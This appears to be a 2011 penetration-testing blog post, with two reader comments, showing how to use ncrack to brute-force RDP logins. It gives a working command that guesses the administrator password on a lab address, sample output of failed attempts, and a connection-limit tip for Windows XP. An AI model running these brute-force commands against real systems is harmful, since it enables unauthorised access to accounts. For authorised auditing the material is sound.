Wednesday, February 9, 2011

move over tsgrinder/tscrack hello ncrack!

So thanks to mubix for telling me that ncrack now supports RDP. very cool stuff.

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10

Fetchfile found /usr/local/share/ncrack/default.pwd

Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST

rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
rdp://192.168.1.100:3389 (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp://192.168.1.100:3389 (EID 1522) Login failed: 'administrator' 'allstar'
rdp://192.168.1.100:3389 last: 0.00 current 0.00 parallelism 10
rdp://192.168.1.100:3389 Increasing connection limit to: 10
rdp://192.168.1.100:3389 (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00
...


Keep in mind that against XP you can only have one connection at a time so you'll have to set your Connection Limit value to 1 (CL=1)

2 comments:

Anonymous said...

CG, was wondering if you know of any new tools that will BF/Audit RDP when a warning/logon banner is set from the server?

appears ncrack cannot get past this, tsgrinder has similar limitations, as does the foofus patch for rdesktop.

thx
Jeff

CG said...

sorry jeff i dont